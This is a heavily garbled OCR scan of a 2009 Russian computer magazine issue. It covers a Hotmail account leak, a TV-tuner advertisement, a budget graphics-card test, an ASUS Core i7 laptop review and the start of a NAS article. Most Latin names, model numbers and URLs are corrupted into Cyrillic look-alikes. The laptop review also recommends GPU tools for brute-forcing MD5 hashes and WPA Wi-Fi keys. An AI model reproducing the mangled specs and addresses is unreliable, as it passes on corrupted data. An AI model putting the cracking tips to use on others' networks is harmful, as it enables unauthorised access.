хакерами. Хуже того, данные, собранные хакерами, утекли в 
Сеть — журналисты ВВС Ыеѵѵз собственными глазами выде- 
ли, какв начале октября на сайте разіюЬіп.сот выложили 
списокиз 10.028 имен пользователей (начинавшихся с букв 
Аи В). В МісгозоТСуже проводят расследование инцидента 
и, судя по всему, выходит, что взломщики действовали 
обычными фишерскими методами. Подавляющее боль- 
шинство пострадавших европейцы, адреса их ящиков 
оканчивались на Ьоітаіі.сот . тзп.сот и Ііѵе.сот . 




ТВ-тюнеры Сотрго - больш 



ѴісісьМаіе ѴѴ800Р 



Ѵіве Маіе Ѵ150Р 



'Доступный автономный ТВ 
тюнер с поддержкой видео 
разрешения до 1440x900 

■ Встроенный ди на или к для 
прослушивания РМ-радио 

■ Режим РІР - позволяет 
работать на ПК и смотреть 
телевизор одновременно 



Автономный ТВ тюнер о 
поддержкой видео 
разрешения до 1920x1080 
<Гиіі НЕ) 

Гибридный тюнер с 
поддержкой ОѴВ-Т и 
аналогового ТВ 

Встроенный динамик для 
прослушивания РМ-радио 

Функция медиа плеера ( 
фото, видео, аудио} без ПК 
с II ЗВ устройств 



ІѴвООР 



у/гіс * Мя Г® 

ѵі 50 у' 



СОМРКО 

ТІСНМОЮ6У 



ѵѵѵѵѵѵ, со т р гои за , сот 



Где купить 

Моста и регионы РФ, «М-Видео» 
Моста - «Юлмзрт» (495} 287-4241 
Москва - «МТ» (495) 363*9393 
Моста - «РОСАШ5» (495) 755-55-57 
Моста - «КИКС» (495) 974-3333 
Моста - «Альянс» (495) 796-9356 



Моста - «Ашан» (495} 721-2099 
Моста - «ОеНэ Сргпри1;ег5» (495) 737-5274 
Моста - «ОЛАНД* (495)617-0373 
Санкт-Петербург - «Юл март* (612) 334-9939 
Санкт-Петербург - «КЕЙ» (812) ЭЗі-2464 
Санкт-Петербург - «Компьютерный мир» (812} ЭЗЭ-ООЭЗ 
Санкт-Петербург - «РНК Компьютере» (812) 327-3410 
Санкт-Петербург - «Гипермаркет Матрица» (812)441-2222 
Саннт-Петербург - «Мир техники» (812) 331-2222 



Владивосток- «Мир бытовой техники» (4232)33-72-69 

Воронеж - «РЕТ» (4732) 25-93-39 

Краснодар - «КМС+» (861)210-12-79 

Новосибирск - «ТСД» (ТехноСити) (ЗѲЗ) 33248-57, 33241-64 

Самара - «Прагма » (846) 2-701-701 

Тула, ТД ■ «Система» (4872) 35-85-90 

Тюмень - «Арсвнап + й (3452) 45-24-52 

Челябинск - «Спарк Компьютера». (351)771-39-39 

Казахстан, Алматы - «Р1Л.ЗЕЯ», +7(727) 2-91Ѳ-000 








13 Касіеоп 
ІШ 4670 
ІсеОі 



П 



Касіеоп НО 
4770 



і 






РЕРРУЛЛ 



■ АВТОР: СЕРГЕИ НИКИТИН ТЕСТЕР: АВРОРИН КИРИЛЛ 



ЗаррІііге 
Касіеоп НО 4730 



Іпіеі 




М5І N960061 
Т2051 2-ОС 



ТЕСТИРОВАНИЕ 

БЮДЖЕТНЫХ 

ГРАФИЧЕСКИХ 

АДАПТЕРОВ 




НІЗ Касіеоп 
НО 4670 
ІсеО 



ВСЕ МЫ ПРЕКРАСНО ЗНАЕМ, НТО КОМПЬЮТЕРНЫЕ ИГРЫ - ГЛАВНЫЙ ДВИГАТЕЛЬ 
КОМПЬЮТЕРНОГО ПРОГРЕССА И, ЕСЛИ БЫ НЕ ОНИ, ТО ВСЕ ЭТИ СВЕРХМОЩНЫЕ 
КОМПОНЕНТЫ, КОТОРЫЕ МЫ ВИДИМ НА ПРИЛАВКАХ, НИКОМУ НЕ БЫЛИ БЫ НУЖНЫ. 
НО СЕГОДНЯ МЫ ТЕСТИРУЕМ ГРАФИЧЕСКИЕ АДАПТЕРЫ, ЧЬЯ СТОИМОСТЬ НЕВЕЛИКА, 
А ПРОИЗВОДИТЕЛЬНОСТЬ - ПРОСТО ДОСТАТОЧНА. 



МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Наше исследование делится на три этапа. 
Первый — это синтетическиетесты, в роли 
которых выступал пакетЗОМагк2006. Конечно, 
он частично устарел, но все еще может ис- 
пользоваться для тестирования. Вторая часть 
— использование реальных игровых приложе- 
ний. Мы использовали Сгузіз, СТА IV и ЗітзЗ. 
Третий этап — проверка нагрева графического 
процессора. Она проводилась следующим 
образом: мы устанавливали утилиту Ріѵа Типег 
и запускали в ней мониторингтемпературы 
чипсета. Для того чтобы как следует нагрузить 
и разогреть графический адаптер, запускался 
ОРЮ Тез! из состава Сгузіз. Нужно сказать, что 
прогон осуществлялся три раза, и фиксиро- 
валось последнее показание. Но если было 
видно, что в процессе тестирован ия темпе- 
ратура растет и не останавливается после 
третьего прогона ВРИ ТезПа, мы делали еще 



три дополнительныхзапуска (всего шесть) и, в 
итоге, выясняли истинную рабочую температу- 
ру данного чипсета. Крометого, мы оценивали 
дизайн устройства, систему охлаждения и 
другие конструкторские особенности, удобство 
установки и комплект поставки видеоплаты. 

ТЕХНОЛОГИИ 

Сегодня уже перестали быть редкостью 
видеоплаты, стоимость которых может 
равняться стоимости неплохого домашнего 
компьютера. Конечно, большинство врядли 
приобретет себе такое устройство, особен- 
но учитывая то, что для его полноценной 
работы требуется особый БП, корпус, система 
охлаждения, гигантский монитор и так далее. 
Но давай подумаем, а нужно ли сегодня 
отдавать огромные деньги за видеоплату или 
можно ограничиться значительно меньшей 
суммой? Графический адаптер отвечает за то, 
чтобы действие на экране было красивым и 



быстрым. Практически каждый современный 
игровой движок поддерживает многократные 
антиалиэйсинг и анизотропную фильтрацию, 
различные версии шейдеров, реалистичные 
тени и многие другие технологии ЗО-графи- 
ки, которые позволяюттекстурам и объек- 
там не выглядеть вырезанными из картона 
раскрашенными плоскостями, из которых 
торчат пиксели. Чтобы они отражались (и 
отражались быстро), нам и нужен мощный 
графический процессор. Но важно понимать, 
что им одним дело не обойдется — чтобы 
навороченная игра показала себя во всей 
красе, к нему надо добавлять мощный ЦП, 
большой объем ОЗУ, качественный монитор и 
звуковую систему. Поэтому, если ты думаешь 
о модернизации устаревшей системы, тебе не 
нужен дорогой монстр — толку от него много 
не будет. На ближайшие полгода вполне по- 
дойдет одна из плат нашего теста. Ну а потом 
— глобальный апгрейд! 
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СПИСОК ПРОТЕСТИРОВАННЫХУСТРОЙСТВ: 

НІЗ ШЕ0ІШ4670ІСЕО 
НІ5 РАОЕОМ НО 4770 
М5І N950001 
М5Ш96006Т-Т20512-ОС 
М51 6ЕР0РСЕ 0Т5250 
ЗАРРНІРЕ КАРЕОИ НО 4730 



КОНФИГУРАЦИЯ ТЕСТОВОГО СТЕНДА 

ПРОЦЕССОР: ШТЕІ СОКЕ 2 ОІШ Е8400 
МАТЕРИНСКАЯ ПЛАТА: А5Ц5 Р50 ОЕШХЕ 
ОПЕРАТИВНАЯ ПАМЯТЬ. ГБ: 4. СОКЗАІК ХМ32 Ш2 
ЖЕСТКИЙ ДИСК. ГБ: 640. ѴѴО. 7200 ОБ/МИН 
БЛОК ПИТАНИЯ. ВТ: 1000. ТНЕКМАШКЕ 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴШйОѴѴЗ ѴІЗТА 




НІЗ РАОЕОИ 
НО 4670 ІСЕО 



НІЗ ШЕОИ 
НО 4770 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ ПѴ740 
ТЕХПРОЦЕСС, НМ:40 
РАЗЪЕМЫ: 2хБѴІ, 1х5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 6-пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, МГЦ: 3200 
ТИП ПАМЯТИ: СББП5 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
ШИРИНА ШИНЫ, БИТ: 1 28 
ПОДДЕРЖКА 5І-І/СР055ГІ РЕ: есть 

■■■■■■□□□□ 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ РѴ730 
ТЕХПРОЦЕСС, НМ: 55 
РАЗЪЕМЫ: 2хБѴІ,1х5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: нет 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, МГЦ: 2000 
ТИП ПАМЯТИ: 000 КЗ 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
ШИРИНА ШИНЫ, БИТ: 1 28 
ПОДДЕРЖКА 5І_І/СР055РІ РЕ: есть 

■■■■■■□□□□ 

+ 

Плата отличается от стандартно го устройства на базе чипсета АТІ 
Пабеоп НО 4670 в первую очередьтем, что на ней установлена память 
СББПЗ с рабочей частотой 2000 МГц. Быстродействие устройства в 
стандартной модификации не очень велико, и более быстрая память, 
установленная на данной плате, может исправить ситуацию влучшую 
сторону. Сейчас на рынке плат на основе микросхем АТІ очень много, 
втом числе и производства компании НІ5, а разница между младшей 
моделью АТІ Пабеоп НО 4650 и этим девайсом совсем невелика. Имеет 
смысл потратить немного времени на поиск платы НІ5 Пабеоп НО 4670 
ІсеО какстольже недорогого, но несколько более производительного 
решения. 

Скорость, а, значит, и нагрев платы невелики, но вот кулер на ней стоит 
очень большой, занимающий два слота. Учитывая, что его мощь тут явно 
избыточна, а также то, что он довольно сильно шумит и повышает цену 
платы, мы считаем такой подход чрезмерным. 



По сравнению с платами на чипсетах линейки Пабеоп НО 46хх устройство 
стоитзначительно дороже, но вто же время является по отношению к 
ним настоящим «старшим братом» с множеством улучшений. Во-пер- 
вых, до 40 нм уменьшен техпроцесс, а, следовательно, существенно сни- 
зилосьтепловыделение. Поэтому система охлаждения, установленная 
на плате, обладает компактными размерами. Но, несмотря на это, наши 
термотесты не выявили никаких проблем, перегрев отсутствует даже в 
тяжелых тестах. Во-вторых, память на плате стоитхорошая и довольно 
быстрая, типа СББП5. В итоге, по производительности устройство дого- 
няетболее дорогие девайсы на АТІ Пабеоп НБ 4850. 

Несмотря на все свои плюсы, НІ5 Пабеоп НБ 4770 в цене существенно 
проигрывает платам на чипсете ІЧѴІБІАОеРогсе СТ5250, которыеявля- 
ются их «одноклассниками». Цена у них существенно ниже. Несмотря 
на то, что формально их характеристики выглядят несколько хуже, по 
скорости они превосходят данную плату. 




ХАКЕР 1 1 /131/ 09 



► 017 







РЕВКІІМ 



I СРЕДНЯЯ ТЕМПЕРАТУРА В РЕЖИМЕ 
| СТРЕСС-ТЕСТА (ГРАДУСЫ ЦЕЛЬСИЯ) 

БаррМге Расіеоп НО 4730 
М5І N960061 ОіатопсІ 
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БЮДЖЕТНЫЕ ПЛАТЫ ГРЕЮТСЯ НЕ ОЧЕНЬ СИЛЬНО 



СКУ5ІЗ 1 680X1050, НІ6Н, 6РЦ ТЕ5Т (РРЗ) 

БаррЫге Расіеоп НО 4730 
М5І N96оо6Т ОіатопсІ 
М5І N95006^140512-00 
М5І №50бТ5Тѵѵіп Ргоіг 
НІБ Расіеоп НО 4770 
НІБ Расіеоп НО 4670 ІсеО 
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НАЧТО СПОСОБНА ТА ИЛИ ИНАЯ ПЛАТА НАГЛЯДНО ПОКАЗЫВАЕТ 
ТЯЖЕЛЫЙ ТЕСТ 




МЗІ-М95006Т 

М0512-0С 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ГРАФИЧЕСКИЙ ПРОЦЕССОР: ЫѴЮІА 096 

ТЕХПРОЦЕСС, 55: 55 

РАЗЪЕМЫ: ІхОѴІ, ІхО-БІІВ, Іх-НОМІ 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: нет 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 650 
ЧАСТОТА ПАМЯТИ, МГЦ: 800 
ТИП ПАМЯТИ: ЭООР2 
ОБЪЕМ ПАМЯТИ, МБ:512 
ШИРИНА ШИНЫ, БИТ: 1 28 
ПОДДЕРЖКА БЫ/СРОББРІРЕ: нет 





ОіатопсІ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ГРАФИЧЕСКИЙ ПРОЦЕССОР: ЫѴЮІА096 
ТЕХПРОЦЕСС, НМ: 65 
РАЗЪЕМЫ: 2хОѴІ, 1х5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 1x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 700 
ЧАСТОТА ПАМЯТИ, МГЦ: 1800 
ТИП ПАМЯТИ: 0ООРЗ 
ОБЪЕМ ПАМЯТИ, МБ: 1024 
ШИРИНА ШИНЫ, БИТ: 256 
ПОДДЕРЖКА 51_1/СР055Р1РЕ: есть 




ппп 



■■■□□□□□□ 

+ 

Первое и главное достоинство этой платы, которое сразу бросается в 
глаза, — ее цена. Меньше 2000 рублей, — выглядиточень и очень при- 
влекательно. Крометого, у платы естьтри различных разъема для под- 
ключения — О-50В, ОѴІ и НЮМІ. Еще ее можно похвалитьза компактные 
размеры, отсутствие необходимости в дополнительном питании, а также 
хорошую систему охлаждения. Вот, собственно, и все плюсы. 

Аглавный минусзаключается втом, что, несмотря на крайне низкую 
стоимость, устройство практически не имеетсмысла покупать. Его про- 
изводительность совсем невелика, поэтому, если ты хочешь сэкономить 
на видеоадаптере, лучше прикупить системную плату со встроенной 
графикой. А потом, если появится нужда, докупить отдельную видеоп- 
лату. Крометого, кулер довольно маленький и есть подозрение, что уже 
через годикон можетзашуметь. 



+ 

Несмотря на то, что плате уже немало лет, в некоторых ситуациях ее при- 
обретение по-прежнему еще актуально. Например, учитывая невысокую 
цену, с помощью двух таких плат можно создать Би-массив, благо, такая 
функция поддерживается. Уровень производительности в этом случае 
будет весьма и весьма неплохим, что и продемонстрировали наши 
тесты. Во многом такие результаты достигаются благодаря применению 
достаточно быстрой памяти. Крометого, плату можно неплохо разогнать, 
поэтому, если все хорошо продумать, покупка будетоправданной, а вло- 
жения эффективными. 

0 другой стороны, если ты хочешь играть в современные игры с если уж 
не максимальными, то достаточно высокими настройками, лучше будет 
присмотреться к платам на базе 0еЕогсе 88ОО0Т или 98ОО0Т, которые 
обеспечат совершенно иной уровень производительности. А если 
посерфить в Вети.то вполне можно прикупить и современный девайс на 
0Т525О, причем за не очень большие деньги. 



► 018 
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ТНЕ ЗІМЗ 3. 1 680X1050. ШКА НІ6Н (ЕР5) | СТА IV, 1680X1050. НІбН(РРЗ) 
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I» 

МЗІ N250813 

Тѵѵіп РГ02Г 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: ІМѴЮІА 0926 
ТЕХПРОЦЕСС, НМ: 55 
РАЗЪЕМЫ: 2хОѴІ, ІхЗ-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 6-пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 738 
ЧАСТОТА ПАМЯТИ, МГЦ: 2200 
ТИП ПАМЯТИ: бООНЗ 
ОБЪЕМ ПАМЯТИ, МБ:512 
ШИРИНА ШИНЫ, БИТ: 256 
ПОДДЕРЖКА 5І_І/СГС055РІКЕ: есть 




ЗАРРНІРЕ РАОЕОЫ 
Нй 4730 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ РѴ770 

ТЕХПРОЦЕСС, НМ: 55 

РАЗЪЕМЫ: ІхБѴІ, ІХ-0-51ІВ, ІхНОМІ 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 2x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, М ГЦ: 3600 
ТИП ПАМЯТИ: Ой ОП5 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
ШИРИНА ШИНЫ, БИТ: 1 28 
ПОДДЕРЖКА 5І_І/СВ055РІВЕ: есть 



ІПП 




Плату можно порекомендовать тем, кто любитзаниматься разгоном. Для 
этогоу нее есть все необходимое — построена на базовом, нисколько не 
оверклокнутом чипсете ІЧѴЮІАбеРогсе 0Т5 250 и сохраняетприличный 
потенциал для шаловливых ручек. Но главное — на ней стоит мощная 
нестандартная система охлаждения, которая станетзалогомтого, что 
плата не будет глючить послетвоихэкспериментов. Состоитона из мед- 
ного радиатора с двумя вентиляторами сверху и, по результатам наших 
тестов, показывает себя лучше стандартной турбины. 



Увы, такой вариант издает гораздо больше шума, нежели стандартная 
турбина. Крометого, еслитурбированный кулер большую часть горячего 
воздуха выбрасывает наружу, то вентиляторы, в основном, направляют 
его вниз, что создаст проблемы в том случае, если там стоит еще один 
видеоадаптер. Так что — будь внимательнее. 



Несмотря на достаточно высокую, по сравнению с другими устройст- 
вами в обзоре, цену, плата является лидером по соотношению цены и 
качества. Сумма, отданная за нее в магазине, существенно ниже, чем 
та, которую просятза мощные современные девайсы, но при этом с 
производительностьюу нее все нормально. Благодаря хорошему чип- 
сету и быстрой памяти, с ней ты еще поиграешь. Крометого, она очень 
грамотно сконструирована, поэтому даже в небольшой корпус можно 
установить несколько таких устройств. Система охлаждения на первый 
взгляд может показаться несправляющейся, но наши тесты опровергли 
это впечатление. Никаких проблем с перегревом не возникало. Также 
к плюсам платы относятся три разъема для подключения и неплохой 
разгонный потенциал. 



Явных недостатков у платы нам обнаружить не удалось. За свои деньги 
она предоставляетабсолютно адекватные возможности, а называть их 
слабыми, сравнивая сустройствами, которые дороже втрое, особого 
смысла нет. 



выводы 

Бюджетные видеоплаты в избытке представ- 
лены на рынке и пользуются определенным 
спросом. Лидером сегодняшнего теста стала 



плата М5І Ы2506Т5 Тѵѵіп Ргогг, которая имеет 
хорошие характеристики и неплохой разгонный 
потенциал. А награду «Лучшая покупка» получа- 
етЗаррбіге Набеоп Н Б 4730, которая на все 100% 



оправдываетсвою стоимость. Перед тем как 
тратитьогромныеденьги, хорошенько подумай 
— возможно, одна из этих плат придется тебе по 
Душе--- 
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РЕВВІІЛЛ 



а 



ТКЕМРСШВ 



азііз мбси 



Мощь Соге І7 и С ІЮ А 

Что такоетоповый ноутбук для дома? Если взять самое быстрое железо, 
дорогие компоненты, дополнив классным дисплеем и мультимедий- 
ными возможностями, то получится что-то похожее. А51І5 М6СЕІ — как 
разтакая машинка. Его явно не будешь носить с собой, но в качестве 
настольного решения он дастфору большинству обычных компьютеров. 
Правда, и стоить будет о -го -го, но это уже другая история :). 




ШТЕІ.® СОРЕ™ І7 

Главная особенность этого ноутбука — конечноже, платформа. На 
данный момент А51І5 М60І — первый на российском рынке ноутбук на 
базе нового процессора Іпіеі® Соге™ І7. Впрочем, ноуты только-только 
поступили в продажу: даже протестированный нами экземпляр — 



лишь инженерный образец. Сама платформа Соге™ і 7 не плод мысли 
маркетологов, а действительно совершенно новая разработка с рядом 
приятных особенностей. В протестированном ноутбуке была установле- 
на мобильная версия этой линейки процессоров Іпіеі, удачно унасле- 
довавшая от старших братьев все новые фичи, втом числе и функцию 



► 020 
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ХАРАКТЕРИСТИКИ А5Ы5 М603 

• Процессоры — Іпіеі® Соге™ І7-820ОМ (1 ,73 ГГц, 
3,06 ГГц в режиме ШгЬо), Іпіеі® Соге™ І7-720ОМ (1,6 
ГГц, 2,8 ГГц в режиме ІигЬо) 

• Чипсет МоЬіІе Іпіеі® РМ55 

•Операционная система ѴѴіпсіоѵѵб Ѵізіа® ІІШтаІе/ 
Визіпезз/Ргетіит/Вазіс 

• До 4 Гб оперативной памяти О ОРЗ 1 066/1333 МГц 

• 1 6-дюймовый дисплей с разрешением 1366x768 
пикселей 

• Графика ІМѴЮІА ѲеРогсе ѲТ 240 М с 1 Гб видеопа- 
мяти йОРЗ 

• Винчестер объемом 250/320/500 Гб (5400/7200 об/ 
мин), поддержка двух ИОВ 

• Оптический привод ОМО 5ирег-МиШ/В1и-гау 
СотЬо 

• 2 Мп ѵѵеЬ-камера 

• Размеры — 375x265x34,3-40,6 мм 

• Вес — 3,3 кг с 6-элементным аккумулятором 



ТигЬо Воозі. Штука потрясающая: в случае большой нагрузки, когда 
компьютеру нужна дополнительная производительность, отдельные 
ядра процессора могут разгоняться автоматически. Кстати, о ядрах — в 
любом процессоре І7 их четыре. Причем в новой платформе вновь за- 
действована уже подзабытая технология Нурегібгеабіпд, реализующая 
два виртуальных ядра на одно физическое — в итоге, получаем 8 вир- 
туальных ядер в системе. Воттеперьяточно знаю, как можно удивить 
приятеля — достаточно показать окно та коменеджера с диаграммой 
загрузки каждого из ядер :]. Контроллер памяти находится в самом про- 
цессоре, а не в отдельном чипсете. Главный вопрос — насколько Соге 
І7 быстрее Соге 2 Оио, и быстрее ли вообще? Прирост производитель- 
ности на новых процах оказывается в среднем 25% при равных с Соге 2 
Оио тактовых частотах. Оверклокинг возможен, каки ранее, только при 
установке на ноутбук процессора Ехігете Ебіііоп с разблокированным 
коэффициентом умножения. 

ИГРАМ БЫТЬ! 

В нашем тестовом образце установлен четырехядерный I пЕеІШ) Соге™ 
0820 с частотой 1 .74 ГГц с функцией авторазгона до 2.9 ГГц и и 8-мега- 
байтным кэшем ЕЗ. Вся система работает на чипсете I пііеі РМ55 в связке 
с4 Гб оперативки ОЮРЗ- 1 333 МГц. Кстати говоря, платформа Соге І7 
поддерживает исключительно ООВЗ. В системе установлено два жест- 
кихдиска, причем, от разных производителей — 320 Гб ѴѴезІегп Оідііаі и 
320 Гб Н іТасЬі . Интересно, кто из них проживет дольше? :] Важная часть 
системы — это дискретная видяха ІМѵібіа СеЕогсе СТ 240М с 1 Гб памяти. 
На 16-дюймовом экране с расширением 1366x768 и стакой убойной кон- 
фигурацией можно играть в любые игры. Мультимедийная натура ноута 
подчеркивается во всем. Наша модель М606 была оснащена Віи-гау 
приводом. В верхней части клавиатуры находится специальная сенсор- 
ная панель, с помощью которой осуществляется управление звуком и 
медиа плеером. А по бокам — два качественных динамика от известной 
компании АКес І_ап5Іпд. 

ЫѴОІАСІЮА 

Впрочем, что там игры? Мы-то знаем, что современные видюхи можно 
использовать и в совершенно других целях. Достаточно взглянуть на 
стикер пѴісІіа на корпусе «машинки» с аббревиатурой СІЮА, под- 
тверждающей наше предположение. Да, М606 отлично справится со 
сложными вычислениями с использованием мощности конвейерных 
вычислений процессора твоей видеокарты (6РІІ). Мало-помалу, 
технологию СІЮА берут на вооружение нетолько разработчики 



брутфорсеров и прочих хакерскихтулз, ноивполнеобычныхпри- — 
ложений. После установки последнего Р54 Рбоіозбор’а программа 
радостно сообщает, что отныне поддерживаетускорение за счет 
видеокарты и просит обновить драйвера. Медиаконвертер ВабаЬоот 
[ ѵѵѵѵѵѵ.ЬабаЬооппіІ.сопп І работаеттолько в случае наличия СІЮА, но 
зато переводит видео в нужный формат гораздо быстрее аналогов. 
Другой конвертер — ТМРСЕпс [ ѵѵѵѵѵѵТппраепс.пеі ] — и видеоредактор 
СуЬегЫпк РоѵѵеЮігесІог служит для наложения на картинку сложных 
фильтров. 

Для хакера СІЮА — это вообще вещь особенная. Помнишь задание 
с первого гіпдОсир, когда нужно по хешу разгадать пароль и соль? 
Решить задачу можнотолько в лоб, путем перебора. И хотя связка 
пароль-соль были максимально простые, чтобы подобрать на любом 
компьютере и с минимальным словарем, самый быстрый брутфорсер 
можно написать с использованием СИПА. Реализовать та кую штуку 
очень просто, например, с помощью Руібоп и специальной библиотеки 
РуСиба ( таіЬета.Іісіап.бе/зоДѵѵаге/рѵсиба ). Оценить мощь подобной 
оптимизации можно на примере программы ВагѵѵѴѴЕ (3.14.Ьу/ги/тб5), 
перебирающей тб 5-хеш со скоростью до 350 миллионов ключей в 
секунду! Практически нереальный взлом ключа для беспроводной 
сети, защищенной ѴѴРА, можно сделать чуточку более реальным, если 
составить радужные таблицы и опять же, с помощью СИПА, воспользо- 
ваться утилитой ругіі ( собе.доодіе.сот/р/рѵгіі ). Ты еще спрашиваешь, 
зачем нужна СІЮА? 

Р5 

Резюмируем: М606 относится к классутоповых ноутбуков. Если процес- 
сор и платформа, то новейшие Соге І7. Если память, то обязательно 4 Гб 
ООРЗ. Если видеокарта, то дискретная СеЕогсе 6ТХ240М с поддержкой 
СІЮА. Если привод, то Віи-гау. Если беспроводной адаптер, то обя- 
зательно с поддержкой стандарта 802.1 1 п. И так — во всем. Нам такая 
позиция нравится :).□□ 




ТРЕМРСШВ 



Подробнее о ноутбуках А5 165 серии М и других гаджетах вы можете 
узнать в новом дискуссионном сообществе на ІгепбсІиЬ.п . Тгепб Сіи Ь — 
дискуссионный клуб для тех, кто интересуется прогрессом и задумыва- 
ется о будущем. Участники Тгепб Сіи Ь обсуждаюттехнические новинки, 
информационныетехнологии, футурологию и другиетемы завтрашнего 
Дня. 

Тгепб СІиЬ поддерживается компаниями Іпіеіи А51І5 и проводит регу- 
лярные конкурсы с ценными призами. 

Корпорация Іпіеі, ведущий мировой производитель инновационных полупро- 
водниковых компонентов, разрабатываеттехнологии, продукцию и инициативы, 
направленные на постоянное повышение качества жизни людей и совершенс- 
твование методов их работы. Дополнительную информацию о корпорации I пТеІ 
можно найти на ѴѴеЬ-сервере компании Іпіеі ШрУ/ѵѵѵѵѵѵ.іпіеІ.ги . а также на сайте 
ЬЦрУ/Ыодз.іпІеІ.сот . Для получения дополнительной информации о рейтинге 
процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ.іпіеі.ги/габпд . 
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РЕККІІМ 




СПАСИ 
И СОХРАНИ 

ЧУЛОК ДЛЯ ВАРЕЗНЫХ СБЕРЕЖЕНИЙ 



■ ■ ФЕДЯ ЧЕРЕНКОВ 



былые времена у меня дома было 
три компьютера. Один круглые сутки 
роутил трафиклокалки и раздавал 
интернет, на втором был запущен 
РТР-демон, который с 5-ти жестких 
дисков раздавал поразительные для тех 
времен 600 Гбайт разного стафа. Собственно, 
только третий оставался для обычной работы. 
Со временем, увы, романтика гудящих сутки 
напролет компьютеровушла, и появилось 
стойкое желание от всего этого барахла изба- 
виться.:]. Ну, разве ж не круто отдать все зада- 
чи по обслуживанию сети маленькому роутеру, 
который сам раздает ІР-адреса, фильтрует 
пакеты и пробрасывает порты во внутреннюю 
сеть? Он же ведь сам по себе маленький ком- 
пьютер. В статье «І_еѵеІ-ир для точки доступа» 
мы даже рассказывали, как поднять на роутере 
торрент-клиент, который круглые сутки качал 
бы свежие файлы и раздавал по сети не без 
бубна развернутой ВатЬа’ы. Увы, идея немно- 
го провалилась, потому как девайс явно не был 
предназначен длятакой нагрузки по С5В, а 
потому работал с внешним жестким диском не 
быстрее, чем 2 Мб/с. В тот момент я задумался 
отом, чтобы правильно организовать сетевое 
хранилище. Нужен был специальный девайс, 
который сделал бы доступными по сети файлы 



с подключенныхжестких дисков и бесшумно 
выполнял свою работу круглые сутки. И лишь 
недавно я все-таки разорился по покупку 
хорошего ЫАВ (ЫеЕ/ѵогк АЛасЬесІ Віюгаде], 
который, к приятному удивлению, оказался 
намного более полезным приобретением, чем 
просто «сетевым жестким диском». 

ТИШЕ ВОДЫ, НИЖЕ ТРАВЫ 

Как и многие другие етЬесМесГустройства, 
ЫАВ представляет собой маленький ком- 
пьютер. Если взять какую-либо продвинутую 
новинку, например, сетевой накопитель ОЫАР 
ТВ-21 9 Р, который и стал виновником дыры 
в моем личном бюджете, то внутри у него: 
центральный процессор Магѵеі Кігкѵѵоос1 1 ,2 
ГГц и 512 Мбайтоперативной ООР2, на кото- 
рый установлена специальная версия І_іпих. 
Разница втом, что такой коробочке не нужно 
места на рабочем столе и она практически 
бесшумна. Вместо того чтобы оставлять вклю- 
ченным компьютер с расшаренными дисками, 
который жрет электричество и постоянно 
гудит, часто может быть достаточно одной та- 
кой коробочки. Даже если поставить ее рядом 
особой, то единственное, что услышишь, — 
это работу жестких дисков. Низкий уровень 
шума достигается специальной конструкцией 



ЫАВ’а, малыми оборотами вращения венти- 
лятора, технологией ЗтагіГАЫ, остановкой 
накопителей при отсутствии активности, 
причем многие параметры настраиваются. 
Установить такое устройство жесткий диск - 
раз плюнуть. Достаточно прикрутить его 4-мя 
винтами кспециальной салазке и задвинуть 
в отсек до фиксации. У меня к этому времени 
уже был внешний «терайбайтник» с интер- 
фейсом еВАТА, поэтому наличиеу этого ЫАВ’а 
разъемов еВАТА, к которым также можно под- 
ключить внешние жесткие диски без всякого 
вскрытия устройства, было особенно кстати. 
Таким образом, объем сетевого хранилища не 
ограничен только внутренними ИОО. Причем, 
если для внутренних дисков используются 
никсовые файловые системы ЕХТЗ и ЕХТ4,то 
внешние носители можно подключать (втом 
числе и к портам ІІВВ 2.0] «как есть» с ГАТ и 
ІЧТГВ без необходимости форматирования. 
Любой доступ кфайлам полюбым протоко- 
лам в обязательном порядке фиксируется в 
системном журнале. 

БЫСТРО И НАДЕЖНО 

Может показаться, что если файлы отне- 
сешь подальше от себя, то и работать с ними 
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будешь, соответственно, медленнее. Толк от 
сетевого хранилища, которое еле ползает, 
действительно сомнительный, а этим, увы, 
грешат немало ІЧАЭ’ов, особенно стареньких. 
Впрочем, есть и толковые девайсы, работаю- 
щие «как надо». Подключившись по гигабиту 
к Т5-2 1 9Р, я обнаружил, что эта малышка 
способна записывать на одиночный диск со 
скоростью до 32 Мбайт/сек. Это очень быстро 
- почти также, какесли бы диск был подклю- 
чен просто к настольному ПК. А благодаря 
встроенному контроллеру І5С5І на сетевых 
накопителях (ЗІЧАР можно создавать до вось- 
ми виртуальных дисков, форматировать их в 
требуемой файловой системе и использовать 
какобычныежесткие диски компьютера по 
локальной сети и даже через Инет. В ѴѴіпсІоѵѵз 
ХР-ѴІ5Іа-7/Мас 05 X можно при монтировать 
такой виртуальный диск ксистеме через 
І5С5І и работать с ним на скоростях, которые 
позволяет сеть. Консервативным линуксои- 
